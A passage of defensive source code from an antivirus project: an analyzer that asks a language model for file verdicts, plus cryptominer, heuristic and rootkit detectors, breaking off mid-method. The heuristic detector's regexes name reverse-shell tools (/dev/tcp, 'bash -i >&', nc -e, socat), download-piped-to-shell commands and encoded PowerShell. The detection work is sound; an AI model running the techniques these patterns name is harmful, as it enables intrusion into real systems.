ctx["owner"] = pwd.getpwuid(st.st_uid).pw_name
except Exception:
ctx["owner"] = str(st.st_uid)
except OSError:
pass
try:
with open(file_path, "rb") as f:
raw = f.read(512)
# Try text decode, fall back to hex
try:
ctx["content_preview"] = raw.decode("utf-8", errors="replace")
except Exception:
ctx["content_preview"] = raw.hex()[:512]
except Exception:
pass
return ctx
def analyze(
self,
file_path: str,
threat_name: str,
threat_type: str,
severity: str,
detector: str,
confidence: int = 50,
) -> AIVerdict:
"""Analyze a single detection with AI."""
if not self.available:
# No API key — pass through as-is
return AIVerdict(
verdict="suspicious",
confidence=confidence,
reason="AI analysis unavailable (no API key)",
recommended_action="quarantine",
)
client = self._get_client()
if not client:
return AIVerdict(
verdict="suspicious",
confidence=confidence,
reason="AI client init failed",
recommended_action="quarantine",
)
ctx = self._get_file_context(file_path)
# Truncate the content preview. Note: str.format() does not re-parse
# substituted values, so the preview needs no brace escaping.
preview = ctx.get("content_preview", "")
if len(preview) > 500:
preview = preview[:500] + "..."
user_msg = ANALYSIS_PROMPT.format(
file_path=file_path,
threat_name=threat_name,
threat_type=threat_type,
severity=severity,
detector=detector,
original_confidence=confidence,
file_size=ctx.get("file_size", 0),
permissions=ctx.get("permissions", ""),
owner=ctx.get("owner", ""),
mtime=ctx.get("mtime", ""),
content_preview=preview,
)
text = ""
try:
response = client.messages.create(
model=self._model,
max_tokens=150,
system=SYSTEM_PROMPT.format(environment=self._environment),
messages=[{"role": "user", "content": user_msg}],
)
text = response.content[0].text.strip()
# Parse JSON from response (handle markdown code blocks)
if "```" in text:
parts = text.split("```")
for part in parts[1:]:
cleaned = part.strip()
if cleaned.startswith("json"):
cleaned = cleaned[4:].strip()
if cleaned.startswith("{"):
text = cleaned
break
# Find the JSON object in the response
start = text.find("{")
end = text.rfind("}") + 1
if start >= 0 and end > start:
text = text[start:end]
data = json.loads(text)
return AIVerdict(
verdict=data.get("verdict", "suspicious"),
confidence=data.get("confidence", 50),
reason=data.get("reason", ""),
recommended_action=data.get("recommended_action", "quarantine"),
raw_response=text,
)
except json.JSONDecodeError as exc:
logger.warning("AI returned non-JSON: %s — raw: %s", exc, text[:200])
return AIVerdict(
verdict="suspicious",
confidence=confidence,
reason=f"AI parse error: {text[:100]}",
recommended_action="quarantine",
raw_response=text,
)
except Exception as exc:
logger.error("AI analysis failed: %s", exc)
return AIVerdict(
verdict="suspicious",
confidence=confidence,
reason=f"AI error: {exc}",
recommended_action="quarantine",
)
def analyze_batch(
self,
detections: List[Dict[str, Any]],
) -> List[Dict[str, Any]]:
"""Analyze a batch of detections. Returns enriched detections with AI verdicts.
Each detection dict should have: file_path, threat_name, threat_type, severity, detector
"""
results = []
for d in detections:
verdict = self.analyze(
file_path=d.get("file_path", ""),
threat_name=d.get("threat_name", ""),
threat_type=d.get("threat_type", ""),
severity=d.get("severity", "MEDIUM"),
detector=d.get("detector", ""),
confidence=d.get("confidence", 50),
)
enriched = dict(d)
enriched["ai_verdict"] = verdict.verdict
enriched["ai_confidence"] = verdict.confidence
enriched["ai_reason"] = verdict.reason
enriched["ai_action"] = verdict.recommended_action
results.append(enriched)
return results
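The JSON-recovery logic in `analyze()` (code-fence stripping plus first-`{` / last-`}` slicing) can be exercised in isolation. This is a standalone restatement of that strategy; `extract_verdict_json` is an illustrative name, not part of the module:

```python
import json

def extract_verdict_json(text: str) -> dict:
    """Recover a JSON object from a model reply that may wrap it in
    markdown code fences or surrounding prose (same approach as
    AIAnalyzer.analyze above)."""
    text = text.strip()
    if "```" in text:
        # Prefer a fenced block that starts with "{" (optionally tagged "json").
        for part in text.split("```")[1:]:
            cleaned = part.strip()
            if cleaned.startswith("json"):
                cleaned = cleaned[4:].strip()
            if cleaned.startswith("{"):
                text = cleaned
                break
    # Fall back to slicing out the outermost braces.
    start, end = text.find("{"), text.rfind("}") + 1
    if start >= 0 and end > start:
        text = text[start:end]
    return json.loads(text)
```

This tolerates the common failure modes of "reply ONLY JSON" prompts: leading prose, trailing commentary, and markdown fences.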

View File

@@ -0,0 +1,129 @@
"""Abstract base class and shared data structures for AYN detectors."""
from __future__ import annotations
import logging
from abc import ABC, abstractmethod
from dataclasses import dataclass, field
from pathlib import Path
from typing import List, Optional
logger = logging.getLogger(__name__)
# ---------------------------------------------------------------------------
# Detection result
# ---------------------------------------------------------------------------
@dataclass
class DetectionResult:
"""A single detection produced by a detector.
Attributes
----------
threat_name:
Short identifier for the threat (e.g. ``"Trojan.Miner.XMRig"``).
threat_type:
Category string — ``VIRUS``, ``MALWARE``, ``SPYWARE``, ``MINER``,
``ROOTKIT``, ``HEURISTIC``, etc.
severity:
One of ``CRITICAL``, ``HIGH``, ``MEDIUM``, ``LOW``.
confidence:
How confident the detector is in the finding (0-100).
details:
Human-readable explanation.
detector_name:
Which detector produced this result.
"""
threat_name: str
threat_type: str
severity: str
confidence: int
details: str
detector_name: str
# ---------------------------------------------------------------------------
# Abstract base
# ---------------------------------------------------------------------------
class BaseDetector(ABC):
"""Interface that every AYN detector must implement.
Detectors receive a file path (and optionally pre-read content / hash)
and return zero or more :class:`DetectionResult` instances.
"""
# ------------------------------------------------------------------
# Identity
# ------------------------------------------------------------------
@property
@abstractmethod
def name(self) -> str:
"""Machine-friendly detector identifier."""
...
@property
@abstractmethod
def description(self) -> str:
"""One-line human-readable summary."""
...
# ------------------------------------------------------------------
# Detection
# ------------------------------------------------------------------
@abstractmethod
def detect(
self,
file_path: str | Path,
file_content: Optional[bytes] = None,
file_hash: Optional[str] = None,
) -> List[DetectionResult]:
"""Run detection logic against a single file.
Parameters
----------
file_path:
Path to the file on disk.
file_content:
Optional pre-read bytes of the file (avoids double-read).
file_hash:
Optional pre-computed SHA-256 hex digest.
Returns
-------
list[DetectionResult]
Empty list when the file is clean.
"""
...
# ------------------------------------------------------------------
# Helpers
# ------------------------------------------------------------------
def _read_content(
self,
file_path: Path,
file_content: Optional[bytes],
max_bytes: int = 10 * 1024 * 1024,
) -> bytes:
"""Return *file_content* if provided, otherwise read from disk.
Reads at most *max_bytes* to avoid unbounded memory usage.
"""
if file_content is not None:
return file_content
with open(file_path, "rb") as fh:
return fh.read(max_bytes)
def _log(self, msg: str, *args) -> None:
logger.info("[%s] " + msg, self.name, *args)
def _warn(self, msg: str, *args) -> None:
logger.warning("[%s] " + msg, self.name, *args)
def _error(self, msg: str, *args) -> None:
logger.error("[%s] " + msg, self.name, *args)

View File

@@ -0,0 +1,317 @@
"""Crypto-miner detector for AYN Antivirus.
Combines file-content analysis, process inspection, and network connection
checks to detect cryptocurrency mining activity on the host.
"""
from __future__ import annotations
import logging
import re
from pathlib import Path
from typing import List, Optional
import psutil
from ayn_antivirus.constants import (
CRYPTO_MINER_PROCESS_NAMES,
CRYPTO_POOL_DOMAINS,
HIGH_CPU_THRESHOLD,
SUSPICIOUS_PORTS,
)
from ayn_antivirus.detectors.base import BaseDetector, DetectionResult
logger = logging.getLogger(__name__)
# ---------------------------------------------------------------------------
# File-content patterns
# ---------------------------------------------------------------------------
_RE_STRATUM = re.compile(rb"stratum\+(?:tcp|ssl|tls)://[^\s\"']+", re.IGNORECASE)
_RE_POOL_DOMAIN = re.compile(
rb"(?:" + b"|".join(re.escape(d.encode()) for d in CRYPTO_POOL_DOMAINS) + rb")",
re.IGNORECASE,
)
_RE_ALGO_REF = re.compile(
rb"\b(?:cryptonight|randomx|ethash|kawpow|equihash|scrypt|sha256d|x11|x13|lyra2rev2|blake2s)\b",
re.IGNORECASE,
)
_RE_MINING_CONFIG = re.compile(
rb"""["'](?:algo|pool|wallet|worker|pass|coin|url|user)["']\s*:\s*["']""",
re.IGNORECASE,
)
# Wallet address patterns (broad but useful).
_RE_BTC_ADDR = re.compile(rb"\b(?:1|3|bc1)[A-HJ-NP-Za-km-z1-9]{25,62}\b")
_RE_ETH_ADDR = re.compile(rb"\b0x[0-9a-fA-F]{40}\b")
_RE_XMR_ADDR = re.compile(rb"\b4[0-9AB][1-9A-HJ-NP-Za-km-z]{93}\b")
class CryptominerDetector(BaseDetector):
"""Detect cryptocurrency mining activity via files, processes, and network."""
# ------------------------------------------------------------------
# BaseDetector interface
# ------------------------------------------------------------------
@property
def name(self) -> str:
return "cryptominer_detector"
@property
def description(self) -> str:
return "Detects crypto-mining binaries, configs, processes, and network traffic"
def detect(
self,
file_path: str | Path,
file_content: Optional[bytes] = None,
file_hash: Optional[str] = None,
) -> List[DetectionResult]:
"""Analyse a file for mining indicators.
Also checks running processes and network connections for live mining
activity (these are host-wide and not specific to *file_path*, but
are included for a comprehensive picture).
"""
file_path = Path(file_path)
results: List[DetectionResult] = []
try:
content = self._read_content(file_path, file_content)
except OSError as exc:
self._warn("Cannot read %s: %s", file_path, exc)
return results
# --- File-content checks ---
results.extend(self._check_stratum_urls(file_path, content))
results.extend(self._check_pool_domains(file_path, content))
results.extend(self._check_algo_references(file_path, content))
results.extend(self._check_mining_config(file_path, content))
results.extend(self._check_wallet_addresses(file_path, content))
return results
# ------------------------------------------------------------------
# File-content checks
# ------------------------------------------------------------------
def _check_stratum_urls(
self, file_path: Path, content: bytes
) -> List[DetectionResult]:
results: List[DetectionResult] = []
matches = _RE_STRATUM.findall(content)
if matches:
urls = [m.decode(errors="replace") for m in matches[:5]]
results.append(DetectionResult(
threat_name="Miner.Stratum.URL",
threat_type="MINER",
severity="CRITICAL",
confidence=95,
details=f"Stratum mining URL(s) found: {', '.join(urls)}",
detector_name=self.name,
))
return results
def _check_pool_domains(
self, file_path: Path, content: bytes
) -> List[DetectionResult]:
results: List[DetectionResult] = []
matches = _RE_POOL_DOMAIN.findall(content)
if matches:
domains = sorted(set(m.decode(errors="replace") for m in matches))
results.append(DetectionResult(
threat_name="Miner.PoolDomain",
threat_type="MINER",
severity="HIGH",
confidence=90,
details=f"Mining pool domain(s) referenced: {', '.join(domains[:5])}",
detector_name=self.name,
))
return results
def _check_algo_references(
self, file_path: Path, content: bytes
) -> List[DetectionResult]:
results: List[DetectionResult] = []
matches = _RE_ALGO_REF.findall(content)
if matches:
algos = sorted(set(m.decode(errors="replace").lower() for m in matches))
results.append(DetectionResult(
threat_name="Miner.AlgorithmReference",
threat_type="MINER",
severity="MEDIUM",
confidence=60,
details=f"Mining algorithm reference(s): {', '.join(algos)}",
detector_name=self.name,
))
return results
def _check_mining_config(
self, file_path: Path, content: bytes
) -> List[DetectionResult]:
results: List[DetectionResult] = []
matches = _RE_MINING_CONFIG.findall(content)
if len(matches) >= 2:
results.append(DetectionResult(
threat_name="Miner.ConfigFile",
threat_type="MINER",
severity="HIGH",
confidence=85,
details=(
f"File resembles a mining configuration "
f"({len(matches)} config key(s) detected)"
),
detector_name=self.name,
))
return results
def _check_wallet_addresses(
self, file_path: Path, content: bytes
) -> List[DetectionResult]:
results: List[DetectionResult] = []
wallets: List[str] = []
for label, regex in [
("BTC", _RE_BTC_ADDR),
("ETH", _RE_ETH_ADDR),
("XMR", _RE_XMR_ADDR),
]:
matches = regex.findall(content)
for m in matches[:3]:
wallets.append(f"{label}:{m.decode(errors='replace')[:20]}")
if wallets:
results.append(DetectionResult(
threat_name="Miner.WalletAddress",
threat_type="MINER",
severity="HIGH",
confidence=70,
details=f"Cryptocurrency wallet address(es): {', '.join(wallets[:5])}",
detector_name=self.name,
))
return results
# ------------------------------------------------------------------
# Process-based detection (host-wide, not file-specific)
# ------------------------------------------------------------------
@staticmethod
def find_miner_processes() -> List[DetectionResult]:
"""Scan running processes for known miner names.
This is a host-wide check and should be called independently from
the per-file ``detect()`` method.
"""
results: List[DetectionResult] = []
for proc in psutil.process_iter(["pid", "name", "cmdline", "cpu_percent"]):
try:
info = proc.info
pname = (info.get("name") or "").lower()
cmdline = " ".join(info.get("cmdline") or []).lower()
for miner in CRYPTO_MINER_PROCESS_NAMES:
if miner in pname or miner in cmdline:
results.append(DetectionResult(
threat_name=f"Miner.Process.{miner}",
threat_type="MINER",
severity="CRITICAL",
confidence=95,
details=(
f"Known miner process running: {info.get('name')} "
f"(PID {info['pid']}, CPU {info.get('cpu_percent', 0):.1f}%)"
),
detector_name="cryptominer_detector",
))
break
except (psutil.NoSuchProcess, psutil.AccessDenied, psutil.ZombieProcess):
continue
return results
# ------------------------------------------------------------------
# CPU analysis (host-wide)
# ------------------------------------------------------------------
@staticmethod
def find_high_cpu_processes(
threshold: float = HIGH_CPU_THRESHOLD,
) -> List[DetectionResult]:
"""Flag processes consuming CPU above *threshold* percent."""
results: List[DetectionResult] = []
for proc in psutil.process_iter(["pid", "name", "cpu_percent"]):
try:
info = proc.info
cpu = info.get("cpu_percent") or 0.0
if cpu > threshold:
results.append(DetectionResult(
threat_name="Miner.HighCPU",
threat_type="MINER",
severity="HIGH",
confidence=55,
details=(
f"Process {info.get('name')} (PID {info['pid']}) "
f"using {cpu:.1f}% CPU"
),
detector_name="cryptominer_detector",
))
except (psutil.NoSuchProcess, psutil.AccessDenied, psutil.ZombieProcess):
continue
return results
# ------------------------------------------------------------------
# Network detection (host-wide)
# ------------------------------------------------------------------
@staticmethod
def find_mining_connections() -> List[DetectionResult]:
"""Check active network connections for mining pool traffic."""
results: List[DetectionResult] = []
try:
connections = psutil.net_connections(kind="inet")
except psutil.AccessDenied:
logger.warning("Insufficient permissions to read network connections")
return results
for conn in connections:
raddr = conn.raddr
if not raddr:
continue
remote_ip = raddr.ip
remote_port = raddr.port
proc_name = ""
if conn.pid:
try:
proc_name = psutil.Process(conn.pid).name()
except (psutil.NoSuchProcess, psutil.AccessDenied):
proc_name = "?"
if remote_port in SUSPICIOUS_PORTS:
results.append(DetectionResult(
threat_name="Miner.Network.SuspiciousPort",
threat_type="MINER",
severity="HIGH",
confidence=75,
details=(
f"Connection to port {remote_port} "
f"({remote_ip}, process={proc_name}, PID={conn.pid})"
),
detector_name="cryptominer_detector",
))
            # conn.raddr.ip is numeric, so a substring test against pool *domains*
            # can never match; reverse-resolve the IP first (best effort, may be slow).
            import socket
            try:
                remote_host = socket.gethostbyaddr(remote_ip)[0].lower()
            except OSError:
                remote_host = remote_ip
            for domain in CRYPTO_POOL_DOMAINS:
                if domain in remote_host:
results.append(DetectionResult(
threat_name="Miner.Network.PoolConnection",
threat_type="MINER",
severity="CRITICAL",
confidence=95,
details=(
f"Active connection to mining pool {domain} "
f"({remote_ip}:{remote_port}, process={proc_name})"
),
detector_name="cryptominer_detector",
))
break
return results


@@ -0,0 +1,436 @@
"""Heuristic detector for AYN Antivirus.
Uses statistical and pattern-based analysis to flag files that *look*
malicious even when no signature or YARA rule matches. Checks include
Shannon entropy (packed/encrypted binaries), suspicious string patterns,
obfuscation indicators, ELF anomalies, and permission/location red flags.
"""
from __future__ import annotations
import logging
import math
import re
import stat
from collections import Counter
from datetime import datetime, timedelta
from pathlib import Path
from typing import List, Optional
from ayn_antivirus.constants import SUSPICIOUS_EXTENSIONS
from ayn_antivirus.detectors.base import BaseDetector, DetectionResult
logger = logging.getLogger(__name__)
# ---------------------------------------------------------------------------
# Thresholds
# ---------------------------------------------------------------------------
_HIGH_ENTROPY_THRESHOLD = 7.5 # bits per byte — likely packed / encrypted
_CHR_CHAIN_MIN = 6 # minimum chr()/\xNN sequence length
_B64_MIN_LENGTH = 40 # minimum base64 blob considered suspicious
# ---------------------------------------------------------------------------
# Compiled regexes (built once at import time)
# ---------------------------------------------------------------------------
_RE_BASE64_BLOB = re.compile(
rb"(?:(?:[A-Za-z0-9+/]{4}){10,})(?:[A-Za-z0-9+/]{2}==|[A-Za-z0-9+/]{3}=)?"
)
_RE_EVAL_EXEC = re.compile(rb"\b(?:eval|exec|compile)\s*\(", re.IGNORECASE)
_RE_SYSTEM_CALL = re.compile(
rb"\b(?:os\.system|subprocess\.(?:call|run|Popen)|commands\.getoutput)\s*\(",
re.IGNORECASE,
)
_RE_REVERSE_SHELL = re.compile(
rb"(?:/dev/tcp/|bash\s+-i\s+>&|nc\s+-[elp]|ncat\s+-|socat\s+|python[23]?\s+-c\s+['\"]import\s+socket)",
re.IGNORECASE,
)
_RE_WGET_CURL_PIPE = re.compile(
rb"(?:wget|curl)\s+[^\n]*\|\s*(?:sh|bash|python|perl)", re.IGNORECASE
)
_RE_ENCODED_PS = re.compile(
rb"-(?:enc(?:odedcommand)?|e|ec)\s+[A-Za-z0-9+/=]{20,}", re.IGNORECASE
)
_RE_CHR_CHAIN = re.compile(
rb"(?:chr\s*\(\s*\d+\s*\)\s*[\.\+]\s*){" + str(_CHR_CHAIN_MIN).encode() + rb",}",
re.IGNORECASE,
)
_RE_HEX_STRING = re.compile(
rb"(?:\\x[0-9a-fA-F]{2}){8,}"
)
_RE_STRING_CONCAT = re.compile(
rb"""(?:["'][^"']{1,4}["']\s*[\+\.]\s*){6,}""",
)
# UPX magic at the beginning of packed sections.
_UPX_MAGIC = b"UPX!"
# System directories where world-writable or SUID files are suspicious.
_SYSTEM_DIRS = {"/usr/bin", "/usr/sbin", "/bin", "/sbin", "/usr/local/bin", "/usr/local/sbin"}
# Locations where hidden files are suspicious.
_SUSPICIOUS_HIDDEN_DIRS = {"/tmp", "/var/tmp", "/dev/shm", "/var/www", "/srv"}
class HeuristicDetector(BaseDetector):
"""Flag files that exhibit suspicious characteristics without a known signature."""
# ------------------------------------------------------------------
# BaseDetector interface
# ------------------------------------------------------------------
@property
def name(self) -> str:
return "heuristic_detector"
@property
def description(self) -> str:
return "Statistical and pattern-based heuristic analysis"
def detect(
self,
file_path: str | Path,
file_content: Optional[bytes] = None,
file_hash: Optional[str] = None,
) -> List[DetectionResult]:
file_path = Path(file_path)
results: List[DetectionResult] = []
try:
content = self._read_content(file_path, file_content)
except OSError as exc:
self._warn("Cannot read %s: %s", file_path, exc)
return results
# --- Entropy analysis ---
results.extend(self._check_entropy(file_path, content))
# --- Suspicious string patterns ---
results.extend(self._check_suspicious_strings(file_path, content))
# --- Obfuscation indicators ---
results.extend(self._check_obfuscation(file_path, content))
# --- ELF anomalies ---
results.extend(self._check_elf_anomalies(file_path, content))
# --- Permission / location anomalies ---
results.extend(self._check_permission_anomalies(file_path))
# --- Hidden files in suspicious locations ---
results.extend(self._check_hidden_files(file_path))
# --- Recently modified system files ---
results.extend(self._check_recent_system_modification(file_path))
return results
# ------------------------------------------------------------------
# Entropy
# ------------------------------------------------------------------
@staticmethod
def calculate_entropy(data: bytes) -> float:
"""Calculate Shannon entropy (bits per byte) of *data*.
        Returns a value between 0.0 (constant data) and 8.0 (uniform randomness).
"""
if not data:
return 0.0
length = len(data)
freq = Counter(data)
entropy = 0.0
for count in freq.values():
p = count / length
if p > 0:
entropy -= p * math.log2(p)
return entropy
def _check_entropy(
self, file_path: Path, content: bytes
) -> List[DetectionResult]:
results: List[DetectionResult] = []
if len(content) < 256:
return results # too short for meaningful entropy
entropy = self.calculate_entropy(content)
if entropy > _HIGH_ENTROPY_THRESHOLD:
results.append(DetectionResult(
threat_name="Heuristic.Packed.HighEntropy",
threat_type="MALWARE",
severity="MEDIUM",
confidence=65,
details=(
f"File entropy {entropy:.2f} bits/byte exceeds threshold "
f"({_HIGH_ENTROPY_THRESHOLD}) — likely packed or encrypted"
),
detector_name=self.name,
))
return results
# ------------------------------------------------------------------
# Suspicious strings
# ------------------------------------------------------------------
def _check_suspicious_strings(
self, file_path: Path, content: bytes
) -> List[DetectionResult]:
results: List[DetectionResult] = []
# Base64-encoded payloads.
b64_blobs = _RE_BASE64_BLOB.findall(content)
long_blobs = [b for b in b64_blobs if len(b) >= _B64_MIN_LENGTH]
if long_blobs:
results.append(DetectionResult(
threat_name="Heuristic.Obfuscation.Base64Payload",
threat_type="MALWARE",
severity="MEDIUM",
confidence=55,
details=f"Found {len(long_blobs)} large base64-encoded blob(s)",
detector_name=self.name,
))
# eval / exec / compile calls.
if _RE_EVAL_EXEC.search(content):
results.append(DetectionResult(
threat_name="Heuristic.Suspicious.DynamicExecution",
threat_type="MALWARE",
severity="MEDIUM",
confidence=50,
details="File uses eval()/exec()/compile() — possible code injection",
detector_name=self.name,
))
# os.system / subprocess calls.
if _RE_SYSTEM_CALL.search(content):
results.append(DetectionResult(
threat_name="Heuristic.Suspicious.SystemCall",
threat_type="MALWARE",
severity="MEDIUM",
confidence=45,
details="File invokes system commands via os.system/subprocess",
detector_name=self.name,
))
# Reverse shell patterns.
match = _RE_REVERSE_SHELL.search(content)
if match:
results.append(DetectionResult(
threat_name="Heuristic.ReverseShell",
threat_type="MALWARE",
severity="CRITICAL",
confidence=85,
details=f"Reverse shell pattern detected: {match.group()[:80]!r}",
detector_name=self.name,
))
# wget/curl piped to sh/bash.
if _RE_WGET_CURL_PIPE.search(content):
results.append(DetectionResult(
threat_name="Heuristic.Dropper.PipeToShell",
threat_type="MALWARE",
severity="HIGH",
confidence=80,
details="File downloads and pipes directly to a shell interpreter",
detector_name=self.name,
))
# Encoded PowerShell command.
if _RE_ENCODED_PS.search(content):
results.append(DetectionResult(
threat_name="Heuristic.PowerShell.EncodedCommand",
threat_type="MALWARE",
severity="HIGH",
confidence=75,
details="Encoded PowerShell command detected",
detector_name=self.name,
))
return results
# ------------------------------------------------------------------
# Obfuscation
# ------------------------------------------------------------------
def _check_obfuscation(
self, file_path: Path, content: bytes
) -> List[DetectionResult]:
results: List[DetectionResult] = []
# chr() chains.
if _RE_CHR_CHAIN.search(content):
results.append(DetectionResult(
threat_name="Heuristic.Obfuscation.ChrChain",
threat_type="MALWARE",
severity="MEDIUM",
confidence=60,
details="Obfuscation via long chr() concatenation chain",
detector_name=self.name,
))
# Hex-encoded byte strings.
hex_matches = _RE_HEX_STRING.findall(content)
if len(hex_matches) > 3:
results.append(DetectionResult(
threat_name="Heuristic.Obfuscation.HexStrings",
threat_type="MALWARE",
severity="MEDIUM",
confidence=55,
details=f"Multiple hex-encoded strings detected ({len(hex_matches)} occurrences)",
detector_name=self.name,
))
# Excessive string concatenation.
if _RE_STRING_CONCAT.search(content):
results.append(DetectionResult(
threat_name="Heuristic.Obfuscation.StringConcat",
threat_type="MALWARE",
severity="LOW",
confidence=40,
details="Excessive short-string concatenation — possible obfuscation",
detector_name=self.name,
))
return results
# ------------------------------------------------------------------
# ELF anomalies
# ------------------------------------------------------------------
def _check_elf_anomalies(
self, file_path: Path, content: bytes
) -> List[DetectionResult]:
results: List[DetectionResult] = []
        if content[:4] != b"\x7fELF":
return results
# UPX packed.
if _UPX_MAGIC in content[:4096]:
results.append(DetectionResult(
threat_name="Heuristic.Packed.UPX",
threat_type="MALWARE",
severity="MEDIUM",
confidence=60,
details="ELF binary is UPX-packed",
detector_name=self.name,
))
# Stripped binary in unusual location.
path_str = str(file_path)
is_in_system = any(path_str.startswith(d) for d in _SYSTEM_DIRS)
if not is_in_system:
# Non-system ELF — more suspicious if stripped (no .symtab).
if b".symtab" not in content and b".debug" not in content:
results.append(DetectionResult(
threat_name="Heuristic.ELF.StrippedNonSystem",
threat_type="MALWARE",
severity="LOW",
confidence=35,
details="Stripped ELF binary found outside standard system directories",
detector_name=self.name,
))
return results
# ------------------------------------------------------------------
# Permission anomalies
# ------------------------------------------------------------------
def _check_permission_anomalies(
self, file_path: Path
) -> List[DetectionResult]:
results: List[DetectionResult] = []
try:
st = file_path.stat()
except OSError:
return results
mode = st.st_mode
path_str = str(file_path)
# World-writable file in a system directory.
is_in_system = any(path_str.startswith(d) for d in _SYSTEM_DIRS)
if is_in_system and (mode & stat.S_IWOTH):
results.append(DetectionResult(
threat_name="Heuristic.Permissions.WorldWritableSystem",
threat_type="MALWARE",
severity="HIGH",
confidence=70,
details=f"World-writable file in system directory: {file_path}",
detector_name=self.name,
))
# SUID/SGID on unusual files.
is_suid = bool(mode & stat.S_ISUID)
is_sgid = bool(mode & stat.S_ISGID)
if (is_suid or is_sgid) and not is_in_system:
flag = "SUID" if is_suid else "SGID"
results.append(DetectionResult(
threat_name=f"Heuristic.Permissions.{flag}NonSystem",
threat_type="MALWARE",
severity="HIGH",
confidence=75,
details=f"{flag} bit set on file outside system directories: {file_path}",
detector_name=self.name,
))
return results
# ------------------------------------------------------------------
# Hidden files in suspicious locations
# ------------------------------------------------------------------
def _check_hidden_files(
self, file_path: Path
) -> List[DetectionResult]:
results: List[DetectionResult] = []
if not file_path.name.startswith("."):
return results
path_str = str(file_path)
for sus_dir in _SUSPICIOUS_HIDDEN_DIRS:
if path_str.startswith(sus_dir):
results.append(DetectionResult(
threat_name="Heuristic.HiddenFile.SuspiciousLocation",
threat_type="MALWARE",
severity="MEDIUM",
confidence=50,
details=f"Hidden file in suspicious directory: {file_path}",
detector_name=self.name,
))
break
return results
# ------------------------------------------------------------------
# Recently modified system files
# ------------------------------------------------------------------
def _check_recent_system_modification(
self, file_path: Path
) -> List[DetectionResult]:
results: List[DetectionResult] = []
path_str = str(file_path)
is_in_system = any(path_str.startswith(d) for d in _SYSTEM_DIRS)
if not is_in_system:
return results
try:
mtime = datetime.utcfromtimestamp(file_path.stat().st_mtime)
except OSError:
return results
if datetime.utcnow() - mtime < timedelta(hours=24):
results.append(DetectionResult(
threat_name="Heuristic.SystemFile.RecentlyModified",
threat_type="MALWARE",
severity="MEDIUM",
confidence=45,
details=(
f"System file modified within the last 24 hours: "
f"{file_path} (mtime: {mtime.isoformat()})"
),
detector_name=self.name,
))
return results
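The entropy heuristic at the top of this file is easy to check in isolation; a standalone sketch equivalent to `calculate_entropy`:

```python
import math
from collections import Counter

def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte: 0.0 (constant run) to 8.0 (uniform)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())
```

A constant byte run scores 0.0 and a buffer containing each of the 256 byte values equally often scores exactly 8.0, which is why packed or encrypted payloads cluster above the 7.5 threshold.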


@@ -0,0 +1,387 @@
"""Rootkit detector for AYN Antivirus.
Performs system-wide checks for indicators of rootkit compromise: known
rootkit files, modified system binaries, hidden processes, hidden kernel
modules, LD_PRELOAD hijacking, hidden network ports, and tampered logs.
Many checks require **root** privileges. On non-Linux systems, kernel-
module and /proc-based checks are gracefully skipped.
"""
from __future__ import annotations
import logging
import os
import subprocess
from pathlib import Path
from typing import List, Optional, Set
import psutil
from ayn_antivirus.constants import (
KNOWN_ROOTKIT_FILES,
MALICIOUS_ENV_VARS,
)
from ayn_antivirus.detectors.base import BaseDetector, DetectionResult
logger = logging.getLogger(__name__)
class RootkitDetector(BaseDetector):
"""System-wide rootkit detection.
Unlike other detectors, the *file_path* argument is optional. When
called without a path (or with ``file_path=None``) the detector runs
every host-level check. When given a file it limits itself to checks
relevant to that file.
"""
# ------------------------------------------------------------------
# BaseDetector interface
# ------------------------------------------------------------------
@property
def name(self) -> str:
return "rootkit_detector"
@property
def description(self) -> str:
return "Detects rootkits via file, process, module, and environment analysis"
def detect(
self,
file_path: str | Path | None = None,
file_content: Optional[bytes] = None,
file_hash: Optional[str] = None,
) -> List[DetectionResult]:
"""Run rootkit checks.
If *file_path* is ``None``, all system-wide checks are executed.
Otherwise only file-specific checks run.
"""
results: List[DetectionResult] = []
if file_path is not None:
fp = Path(file_path)
# File-specific: is this a known rootkit artefact?
results.extend(self._check_known_rootkit_file(fp))
return results
# --- Full system-wide scan ---
results.extend(self._check_known_rootkit_files())
results.extend(self._check_ld_preload())
results.extend(self._check_ld_so_preload())
results.extend(self._check_hidden_processes())
results.extend(self._check_hidden_kernel_modules())
results.extend(self._check_hidden_network_ports())
results.extend(self._check_malicious_env_vars())
results.extend(self._check_tampered_logs())
return results
# ------------------------------------------------------------------
# Known rootkit files
# ------------------------------------------------------------------
def _check_known_rootkit_files(self) -> List[DetectionResult]:
"""Check every path in :pydata:`KNOWN_ROOTKIT_FILES`."""
results: List[DetectionResult] = []
for path_str in KNOWN_ROOTKIT_FILES:
p = Path(path_str)
if p.exists():
results.append(DetectionResult(
threat_name="Rootkit.KnownFile",
threat_type="ROOTKIT",
severity="CRITICAL",
confidence=90,
details=f"Known rootkit artefact present: {path_str}",
detector_name=self.name,
))
return results
def _check_known_rootkit_file(self, file_path: Path) -> List[DetectionResult]:
"""Check whether *file_path* is a known rootkit file."""
results: List[DetectionResult] = []
path_str = str(file_path)
if path_str in KNOWN_ROOTKIT_FILES:
results.append(DetectionResult(
threat_name="Rootkit.KnownFile",
threat_type="ROOTKIT",
severity="CRITICAL",
confidence=90,
details=f"Known rootkit artefact: {path_str}",
detector_name=self.name,
))
return results
# ------------------------------------------------------------------
# LD_PRELOAD / ld.so.preload
# ------------------------------------------------------------------
def _check_ld_preload(self) -> List[DetectionResult]:
"""Flag the ``LD_PRELOAD`` environment variable if set globally."""
results: List[DetectionResult] = []
val = os.environ.get("LD_PRELOAD", "")
if val:
results.append(DetectionResult(
threat_name="Rootkit.LDPreload.EnvVar",
threat_type="ROOTKIT",
severity="CRITICAL",
confidence=85,
details=f"LD_PRELOAD is set: {val}",
detector_name=self.name,
))
return results
def _check_ld_so_preload(self) -> List[DetectionResult]:
"""Check ``/etc/ld.so.preload`` for suspicious entries."""
results: List[DetectionResult] = []
ld_preload_file = Path("/etc/ld.so.preload")
if not ld_preload_file.exists():
return results
try:
content = ld_preload_file.read_text().strip()
except PermissionError:
self._warn("Cannot read /etc/ld.so.preload")
return results
if content:
            lines = [
                stripped
                for line in content.splitlines()
                if (stripped := line.strip()) and not stripped.startswith("#")
            ]
if lines:
results.append(DetectionResult(
threat_name="Rootkit.LDPreload.File",
threat_type="ROOTKIT",
severity="CRITICAL",
confidence=85,
details=f"/etc/ld.so.preload contains entries: {', '.join(lines[:5])}",
detector_name=self.name,
))
return results
# ------------------------------------------------------------------
# Hidden processes
# ------------------------------------------------------------------
def _check_hidden_processes(self) -> List[DetectionResult]:
"""Compare /proc PIDs with psutil to find hidden processes."""
results: List[DetectionResult] = []
